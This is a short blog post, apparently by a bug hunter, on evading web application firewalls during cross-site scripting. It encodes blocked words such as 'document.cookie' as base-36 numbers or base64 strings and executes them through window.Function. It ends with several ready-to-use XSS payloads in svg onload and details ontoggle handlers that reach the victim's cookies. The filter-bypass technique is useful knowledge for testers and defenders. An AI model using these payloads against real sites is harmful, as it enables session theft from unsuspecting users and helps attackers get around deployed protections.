Radix number and Anonymous Function to Bypass some WAF’s during XSS
Salam Alaikum,
This is my first article in Medium where I’ll talk about the use of Radix number and Lamda function to bypass some WAF’s during XSS.
First of all what is Radix?
The radix parameter is used to specify which numeral system to be used, for example, a radix of 16 (hexadecimal) indicates that the number in the string should be parsed from a hexadecimal number to a decimal number.(w3school : https://www.w3schools.com/jsref/jsref_parseint.asp)
When do we use Radix in our case?
We use Radix number when the WAF blacklist some words like “document.cookie” or “alert , confirm , …etc”
how do we use Radix in our case?
We can use the local console to create the radix number of any word that may be blocked by WAF via parseInt() function example :
parseInt(“document”,36) => 1071753937337 < = this is the radix number of the string “document”.
parseInt(“cookie”,36) => 767051222 < = this is the radix number of the string “cookie”.
36 is called Radix parameter,it an integer in the range 2 through 36 specifying the base to use for representing numeric values.
We can contact it to get “document.cookie” in order to convert back our payload by using toString(36) method
let payload = 1071753937337n.toString(36)+”.”+767051222n.toString(36)
We use throw() method instead of alert to perform an execution POC
parseInt(“throw”,36) => 49537904
Final payload :
lets passe the paylod to eval() function
Where do we use this format of strings?
You can use it when some words are blacklisted as “cookie” …etc , and when you can’t use String.fromCharCode() method or when you can’t use atob() method if the input turns into lowercase (base64 is case sensitive),
So try to check if the method toString() is not blacklisted and formulate your payload as shown.
What is Anonymous Function?
An anonymous function is a function without a name. An anonymous function is often not accessible after its initial creation. but it can be invoked by itself.
let anon= function () {
console.log(‘Anonymous function’)
};
anon(); //Anonymous functionThere is a lot of syntaxes to create an anonymous Function.
the trailing parentheses () allow you to call the function:
(function () {
console.log('Immediately invoked function execution');
})();
In our case, we will use the Window.Function() or Function() that will help us to bypass Eval() because it’s not blacklisted in the most of WAF.
Window.Function() is a method that takes a function as a parameter in string format, for example :
window.Function("alert(1)");it return :
f anonymous(){
alert(1)
}
as shown this method returns an anonymous function
as we said above we can passe our radix chain to this method, and we get the anonymous function returned :
Or by passing atob(“YWxlcnQoZG9jdW1lbnQuY29va2llKQ==”) into the parameter of the Function method if there are no issues with atob() or the base64 format
The last thing,we use self function invocation by adding () at the end :)
our final payloads :
<svg/onload=’window.Function(49537904n.toString(36)+” “+1071753937337n.toString(36)+”.”+767051222n.toString(36))()’>
<details/open/ontoggle%3d“window.Function(49537904n.toString(36)+‘ ’ +1071753937337n.toString(36)+’.’+767051222n.toString(36))()“>
<details/open/ontoggle%3d“window.Function(atob(“YWxlcnQoZG9jdW1lbnQuY29va2llKQ==”))())“>
That’s All , hope you enjoyed the reading ^_^
Regards,
